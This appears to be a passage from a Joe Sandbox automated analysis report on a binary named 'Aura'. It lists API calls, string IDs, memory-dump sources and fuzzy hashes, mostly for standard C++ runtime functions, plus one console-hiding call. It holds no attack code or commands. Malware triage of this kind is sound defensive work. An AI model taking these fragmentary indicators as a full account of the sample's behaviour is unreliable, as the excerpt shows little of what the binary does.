                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.3511036876.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_a0000_Aura.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                                                                                                                                                                                                                                                    • String ID: csm
                                                                                                                                                                                                                                                    • API String ID: 1170836740-1018135373
                                                                                                                                                                                                                                                    • Opcode ID: 347f928e543e06bcc1ee5a6e209db6ec99023486b1fd89f5ed04b77a21a387ff
                                                                                                                                                                                                                                                    • Instruction ID: 883bde7acbd06bb24a39088a67bc793badc3ab3b63f076a584159abe579ba718
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 347f928e543e06bcc1ee5a6e209db6ec99023486b1fd89f5ed04b77a21a387ff
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: E941C034A00218ABCF10DF68C885ADFBBB5AF44314F148965E9256B393D775EE11CB91
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • std::_Lockit::_Lockit.LIBCPMT ref: 000A3CA5
                                                                                                                                                                                                                                                    • std::_Lockit::_Lockit.LIBCPMT ref: 000A3CBF
                                                                                                                                                                                                                                                    • std::_Lockit::~_Lockit.LIBCPMT ref: 000A3CE0
                                                                                                                                                                                                                                                    • __Getctype.LIBCPMT ref: 000A3D92
                                                                                                                                                                                                                                                    • std::_Lockit::~_Lockit.LIBCPMT ref: 000A3DD8
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000002.00000002.3510888592.00000000000A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000A0000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.3510866003.00000000000A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.3510949164.00000000000CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.3510967833.00000000000DA000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.3510987105.00000000000DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.3511003796.00000000000E2000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.3511036876.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_a0000_Aura.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: Lockitstd::_$Lockit::_Lockit::~_$Getctype
                                                                                                                                                                                                                                                    • String ID: e.
                                                                                                                                                                                                                                                    • API String ID: 3087743877-3303777608
                                                                                                                                                                                                                                                    • Opcode ID: df2ac2612825d851409c3278106ae4c5a7463dc43bfeb0731411c4bb53d17c14
                                                                                                                                                                                                                                                    • Instruction ID: 8a5887486b16715f5800fd36eae0f3b4ab960ceb4b124db4489e17f81cabce57
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: df2ac2612825d851409c3278106ae4c5a7463dc43bfeb0731411c4bb53d17c14
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 64415A71E012158FDB14DF94D845BAEB7B1FF55720F14811AE815AB392DB38AE01CFA1
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000002.00000002.3511052669.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.3511052669.0000000000452000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_400000_Aura.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: InitVariant
                                                                                                                                                                                                                                                    • String ID: -$^$_$c$x
                                                                                                                                                                                                                                                    • API String ID: 1927566239-2011743646
                                                                                                                                                                                                                                                    • Opcode ID: 5e0d3c51ad46ec2c06616873faac0f117c26524ed99fea09ff2c6b131de0c4e1
                                                                                                                                                                                                                                                    • Instruction ID: e4baa1acc4d029566cdfd59e8f7d3bb8e186af098319ae9321de840ef7b9e312
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 5e0d3c51ad46ec2c06616873faac0f117c26524ed99fea09ff2c6b131de0c4e1
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: C1415D71108B81CED7158F38C598356BFE16B66324F48869CC5E90F7EAC3759505C7A2
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • GetConsoleWindow.KERNEL32 ref: 000A24DD
                                                                                                                                                                                                                                                    • ShowWindow.USER32(00000000,00000000), ref: 000A24E6
                                                                                                                                                                                                                                                    • GetCurrentThreadId.KERNEL32 ref: 000A2524
                                                                                                                                                                                                                                                      • Part of subcall function 000AF11D: WaitForSingleObjectEx.KERNEL32(?,000000FF,00000000,?,?,?,000A253A,?,?,00000000), ref: 000AF129
                                                                                                                                                                                                                                                      • Part of subcall function 000AF11D: GetExitCodeThread.KERNEL32(?,00000000,?,?,000A253A,?,?,00000000), ref: 000AF142
                                                                                                                                                                                                                                                      • Part of subcall function 000AF11D: CloseHandle.KERNEL32(?,?,?,000A253A,?,?,00000000), ref: 000AF154
                                                                                                                                                                                                                                                    • std::_Throw_Cpp_error.LIBCPMT ref: 000A2567
                                                                                                                                                                                                                                                    • std::_Throw_Cpp_error.LIBCPMT ref: 000A2578
                                                                                                                                                                                                                                                    • std::_Throw_Cpp_error.LIBCPMT ref: 000A2589
                                                                                                                                                                                                                                                    • std::_Throw_Cpp_error.LIBCPMT ref: 000A259A
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000002.00000002.3510888592.00000000000A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000A0000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.3510866003.00000000000A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.3510949164.00000000000CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.3510967833.00000000000DA000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.3510987105.00000000000DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.3511003796.00000000000E2000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.3511036876.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_a0000_Aura.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: Cpp_errorThrow_std::_$ThreadWindow$CloseCodeConsoleCurrentExitHandleObjectShowSingleWait
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 3956949563-0
                                                                                                                                                                                                                                                    • Opcode ID: a33d8a4717427a51b1b274e48b07a806875c25eaee1e91d84e69ef6dd8c1c7a4
                                                                                                                                                                                                                                                    • Instruction ID: 67d43a8c9f39c7f1bab155bf9b9f218932d588ba049a8978c78de756a4ffbb64
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: a33d8a4717427a51b1b274e48b07a806875c25eaee1e91d84e69ef6dd8c1c7a4
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 912165F2D402159BDF10AFE49C06BEE7BB4BF05710F180165F90476282E7B69614CBA6
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • FreeLibrary.KERNEL32(00000000,?,00000000,00000800,?,?,?,BB40E64E,?,000BD01A,000A1170,000AAA08,?,?), ref: 000BCFCC
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000002.00000002.3510888592.00000000000A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000A0000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.3510866003.00000000000A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.3510949164.00000000000CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.3510967833.00000000000DA000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.3510987105.00000000000DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.3511003796.00000000000E2000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.3511036876.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_a0000_Aura.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: FreeLibrary
                                                                                                                                                                                                                                                    • String ID: api-ms-$ext-ms-
                                                                                                                                                                                                                                                    • API String ID: 3664257935-537541572
                                                                                                                                                                                                                                                    • Opcode ID: 5f4c69ceb84b48d86dd9b23cacf1922ade072cb0fd00ee11a1551580ed175d37
                                                                                                                                                                                                                                                    • Instruction ID: a32cd1eeea96eecdbcc20bb540ac55849b2325970f2e4b4b415a6254c84b15b7
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 5f4c69ceb84b48d86dd9b23cacf1922ade072cb0fd00ee11a1551580ed175d37
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 2E21D831A02312ABEB319B65DC40FBE77AADB51760F250172FD55A7290D774ED00CAE0
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • GetModuleHandleW.KERNEL32(kernel32.dll), ref: 000B0086
                                                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,GetSystemTimePreciseAsFileTime), ref: 000B0094
                                                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,GetTempPath2W), ref: 000B00A5
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000002.00000002.3510888592.00000000000A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000A0000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.3510866003.00000000000A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.3510949164.00000000000CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.3510967833.00000000000DA000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.3510987105.00000000000DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.3511003796.00000000000E2000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.3511036876.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_a0000_Aura.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: AddressProc$HandleModule
                                                                                                                                                                                                                                                    • String ID: GetSystemTimePreciseAsFileTime$GetTempPath2W$kernel32.dll
                                                                                                                                                                                                                                                    • API String ID: 667068680-1047828073
                                                                                                                                                                                                                                                    • Opcode ID: f6d93339a8747aa75ab413928d35dfeb521794b31926c19c2e5398523ebcd991
                                                                                                                                                                                                                                                    • Instruction ID: 30c14ed0a74f03f4c9ca02203c46ab45f3e3ef4f7b9c05e6100d6261306c6d7c
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: f6d93339a8747aa75ab413928d35dfeb521794b31926c19c2e5398523ebcd991
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 62D09E755673106BB3105F74BC0999A3BB9FB097113015163FD45D6351DB7A85008675
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000002.00000002.3510888592.00000000000A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000A0000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.3510866003.00000000000A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.3510949164.00000000000CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.3510967833.00000000000DA000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.3510987105.00000000000DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.3511003796.00000000000E2000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.3511036876.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_a0000_Aura.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                    • Opcode ID: 0a1bd94b5cb9e4dc44b947c62f0ae254d0f4d1b47ab91ca2fad09bda804aa455
                                                                                                                                                                                                                                                    • Instruction ID: 191a637f09b986c88c6d2a1961bdf1185aa3e3c610e0e9ccb3fd5d01dcc1160c
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 0a1bd94b5cb9e4dc44b947c62f0ae254d0f4d1b47ab91ca2fad09bda804aa455
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: B6B1F178A04A499FDB11CFA8DC81FEEBBF0BF46311F14415DE9049B292C775A981CBA0
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • std::_Throw_Cpp_error.LIBCPMT ref: 000A9C97
                                                                                                                                                                                                                                                    • std::_Throw_Cpp_error.LIBCPMT ref: 000A9CA8
                                                                                                                                                                                                                                                    • std::_Throw_Cpp_error.LIBCPMT ref: 000A9CBC
                                                                                                                                                                                                                                                    • std::_Throw_Cpp_error.LIBCPMT ref: 000A9CDD
                                                                                                                                                                                                                                                    • std::_Throw_Cpp_error.LIBCPMT ref: 000A9CEE
                                                                                                                                                                                                                                                    • std::_Throw_Cpp_error.LIBCPMT ref: 000A9D06
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000002.00000002.3510888592.00000000000A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000A0000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.3510866003.00000000000A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.3510949164.00000000000CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.3510967833.00000000000DA000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.3510987105.00000000000DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.3511003796.00000000000E2000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.3511036876.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_a0000_Aura.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: Cpp_errorThrow_std::_
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 2134207285-0
                                                                                                                                                                                                                                                    • Opcode ID: 7f496bb3b37bb7aeea23fe749f6603dd3ef3368323919dadd5738ee7107feae7
                                                                                                                                                                                                                                                    • Instruction ID: e2be30453613de19f6f0e1d129d7e393893d93cb1ec8d4631529b8552d84534f
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 7f496bb3b37bb7aeea23fe749f6603dd3ef3368323919dadd5738ee7107feae7
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: DE41B1B1A00B45CBDB309BE489467EFB7F4AF47324F18062DD56A262D3D7716904CBA2
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • GetLastError.KERNEL32(?,?,000BACDE,000B0760,000AB77F,BB40E64E,?,?,?,?,000CBFCA,000000FF), ref: 000BACF5
                                                                                                                                                                                                                                                    • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 000BAD03
                                                                                                                                                                                                                                                    • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 000BAD1C
                                                                                                                                                                                                                                                    • SetLastError.KERNEL32(00000000,?,000BACDE,000B0760,000AB77F,BB40E64E,?,?,?,?,000CBFCA,000000FF), ref: 000BAD6E
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000002.00000002.3510888592.00000000000A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000A0000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.3510866003.00000000000A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.3510949164.00000000000CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.3510967833.00000000000DA000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.3510987105.00000000000DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.3511003796.00000000000E2000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.3511036876.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_a0000_Aura.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: ErrorLastValue___vcrt_
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 3852720340-0
                                                                                                                                                                                                                                                    • Opcode ID: 261bb8bbea0ed9a6a06c1a9d73de49462f0b62a2dc5319b568c79053c9cdf7a3
                                                                                                                                                                                                                                                    • Instruction ID: 022e422ad9c59d92eff771dac21e5234fefd1dee68f19250101a6fb893c365a9
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 261bb8bbea0ed9a6a06c1a9d73de49462f0b62a2dc5319b568c79053c9cdf7a3
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 9001F13231A615AEB7342778BC85EEA3BC4EB02B71720033FFA11415F1EF1648069151
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • type_info::operator==.LIBVCRUNTIME ref: 000BB68D
                                                                                                                                                                                                                                                    • CallUnexpected.LIBVCRUNTIME ref: 000BB906
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000002.00000002.3510888592.00000000000A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000A0000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.3510866003.00000000000A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.3510949164.00000000000CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.3510967833.00000000000DA000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.3510987105.00000000000DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.3511003796.00000000000E2000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.3511036876.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_a0000_Aura.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: CallUnexpectedtype_info::operator==
                                                                                                                                                                                                                                                    • String ID: csm$csm$csm
                                                                                                                                                                                                                                                    • API String ID: 2673424686-393685449
                                                                                                                                                                                                                                                    • Opcode ID: ca1c4f6a6820fe1d8062990db324a0cd19751bbbbc3ab8dad0ad866104199389
                                                                                                                                                                                                                                                    • Instruction ID: b5af7eb2ab4df3231db034709e01d123cf190e6d52cbff01769be434e37afeda
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: ca1c4f6a6820fe1d8062990db324a0cd19751bbbbc3ab8dad0ad866104199389
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 5DB16671900209EFCF24DFA5C8819EEBBB9FF14310F14456AE8116B212DBB5DA61CF92
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • std::_Ref_count_base::_Decref.LIBCPMT ref: 000ABF44
                                                                                                                                                                                                                                                    • std::_Ref_count_base::_Decref.LIBCPMT ref: 000AC028
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000002.00000002.3510888592.00000000000A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000A0000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.3510866003.00000000000A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.3510949164.00000000000CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.3510967833.00000000000DA000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.3510987105.00000000000DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.3511003796.00000000000E2000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.3511036876.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_a0000_Aura.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: DecrefRef_count_base::_std::_
                                                                                                                                                                                                                                                    • String ID: MOC$RCC$csm
                                                                                                                                                                                                                                                    • API String ID: 1456557076-2671469338
                                                                                                                                                                                                                                                    • Opcode ID: f670a74a2002e8bfb354a4506403f5c7105458644fdc57fcebf34d8ed24e3222
                                                                                                                                                                                                                                                    • Instruction ID: 5bb2a6f73fcb4e8a73405aba0ceab59f56fa649bc43957b1cc9387c71836a236
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: f670a74a2002e8bfb354a4506403f5c7105458644fdc57fcebf34d8ed24e3222
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 3D41BA74900204DFCF28DFA8C9459EEB7F5AF4A300F58806DE449AB653CB38AE04CB52
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,BB40E64E,?,?,00000000,000CBE94,000000FF,?,000B5685,000B556C,?,000B5721,00000000), ref: 000B55F9
                                                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 000B560B
                                                                                                                                                                                                                                                    • FreeLibrary.KERNEL32(00000000,?,?,00000000,000CBE94,000000FF,?,000B5685,000B556C,?,000B5721,00000000), ref: 000B562D
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000002.00000002.3510888592.00000000000A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000A0000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.3510866003.00000000000A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.3510949164.00000000000CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.3510967833.00000000000DA000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.3510987105.00000000000DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.3511003796.00000000000E2000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.3511036876.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_a0000_Aura.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: AddressFreeHandleLibraryModuleProc
                                                                                                                                                                                                                                                    • String ID: CorExitProcess$mscoree.dll
                                                                                                                                                                                                                                                    • API String ID: 4061214504-1276376045
                                                                                                                                                                                                                                                    • Opcode ID: ef4003b812754d3fbd97990582050fe27a432330cbcdde01ee9304b2c4084d7d
                                                                                                                                                                                                                                                    • Instruction ID: 4bb3ce20d1918b00c5662f9c64628c3b48e9da1ece0ee1dae6daba3ff6b1bef6
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: ef4003b812754d3fbd97990582050fe27a432330cbcdde01ee9304b2c4084d7d
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: BE016231A51629AFDB119F54DC09BEEB7F8FB04B16F00052AFC11A7290DB7A9900CAA0
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • __alloca_probe_16.LIBCMT ref: 000BD76F
                                                                                                                                                                                                                                                    • __alloca_probe_16.LIBCMT ref: 000BD838
                                                                                                                                                                                                                                                    • __freea.LIBCMT ref: 000BD89F
                                                                                                                                                                                                                                                      • Part of subcall function 000BBF11: HeapAlloc.KERNEL32(00000000,00000018,00000000,?,000AA67D,00000018,?,000A3D4A,00000018,00000000), ref: 000BBF43
                                                                                                                                                                                                                                                    • __freea.LIBCMT ref: 000BD8B2
                                                                                                                                                                                                                                                    • __freea.LIBCMT ref: 000BD8BF
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000002.00000002.3510888592.00000000000A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000A0000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.3510866003.00000000000A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.3510949164.00000000000CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.3510967833.00000000000DA000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.3510987105.00000000000DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.3511003796.00000000000E2000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.3511036876.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_a0000_Aura.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: __freea$__alloca_probe_16$AllocHeap
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 1096550386-0
                                                                                                                                                                                                                                                    • Opcode ID: 03eafbf800552b9ab34e555c501cc7147467724b7d452f4f78dd146e77cc795a
                                                                                                                                                                                                                                                    • Instruction ID: a4fc5b2e8ef1f26a667b3370ebc0b3095f324b884359ff6c124caa44b53371b3
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 03eafbf800552b9ab34e555c501cc7147467724b7d452f4f78dd146e77cc795a
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 04519172600206AFEB219FA1CC85EFBBAE9EF45711B15012BFD04D6252FF71DC1096A0
